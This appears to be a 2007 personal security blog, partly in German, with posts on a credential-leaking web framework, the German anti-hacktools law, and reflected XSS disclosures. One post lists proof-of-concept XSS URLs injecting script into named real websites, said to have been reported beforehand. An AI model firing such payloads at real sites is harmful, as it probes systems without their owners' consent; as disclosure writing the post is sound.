Security

Monday, July 16. 2007

Und wieder einmal Webmontag

Kleine Lehre von heute: Es ist prinzipiell keine gute Idee, wenn die Fehlermeldungen eines Web-Frameworks die Zugangsdaten zur Datenbank enthalten. Wenn sich dann gleichzeitig noch unter leicht auffindbarer URL ein phpMyAdmin befindet, ist das eher noch schlechter.
(URL und Projektname gibt's erstmal nicht, weil das bislang nur teilweise gefixt wurde)

Desweiteren soll es jetzt ein neues, aktiveres Stadtblog für Karlsruhe geben. Vielleicht schreib ich bei Gelegenheit auch mal das ein oder andere.

Ansonsten gab es einige Ideen in Richtung Barcamp auf Wasser (Bodensee oder Rhein). Hört sich erstmal ziemlich cool an, bin gespannt was daraus wird.

Links: Webmontag Karlsruhe

Posted by Hanno Böck in Computer culture, Security, Webdesign at 22:26 | Comments (2) | Trackbacks (0)

Defined tags for this entry: barcamp, bodensee, informationdisclosure, karlsruhe, mysql, rhein, security, webmontag

Friday, July 13. 2007

More XSS

I thought I'd give you some more (all have been informed months ago):

http://thepiratebay.org/search/"><script>alert(1)</script>
http://www.gruene.de/cms/default/dok/144/144640.dokumentsuche.htm?execute=1&suche_voll_starten=1&volltext_suchbegriff="><script>alert(1)</script>
http://www.terions.de/index_whois.php?ddomain="><script>alert(1)</script>
http://www.eselfilme.com/newsletter/newsletter.php?action=sign&email="><script>alert(1)</script>
http://www.region-stuttgart.de/sixcms/rs_suche/?_suche="><script>alert(1)</script>
http://reports.internic.net/cgi/whois?whois_nic="><script>alert(1)</script>&type=domain

Posted by Hanno Böck in English, Security, Webdesign at 04:28 | Comments (0) | Trackbacks (0)

Defined tags for this entry: javascript, security, websecurity, xss

Thursday, July 12. 2007

XSS on helma/gobi

I still have some unresolved xss vulnerabilities around. It seems to be common practice by many web application developers and web designers to ignore such information.

This time we have gobi, a cms system based on the quite popular javascript application server helma.

http://int21.de/cve/CVE-2007-3693-gobi.txt

More to come. As this xss stuff is far too easy (try some common strings in web forms, inform the author, publish some weeks later), I think about doing some kind of automated mechanism to search and report those vulnerabilities.

Posted by Hanno Böck in English, Security, Webdesign at 00:44 | Comments (0) | Trackbacks (0)

Defined tags for this entry: cve, gobi, helma, javascript, security, web, xss

Friday, July 6. 2007

tagesschau über Hacktools

Der Bundesrat hat heute das obskure Verbot von »Hacktools« abgesegnet. Wohl ohne großen Widerstand, wiewohl praktisch jeder, der sich auch nur ansatzweise damit auskennt, das ganze für völlig absurd halten muss. In seltener Einigkeit warnen vom CCC über die GI bis zur Bitkom alle vor dem Gesetzeswerk.

Aber weswegen ich das hier schreibe: Die tagesschau erklärt das ganze sehr brauchbar, was ich dachte, dass ich doch mal lobend erwähnen kann. Vielleicht ein kleiner Beitrag, dass auch nicht-Techies derartiges besser verstehen.

Posted by Hanno Böck in Computer culture, Security at 22:29 | Comments (4) | Trackbacks (0)

Defined tags for this entry: bundesrat, cybercrime, hacktools, tagesschau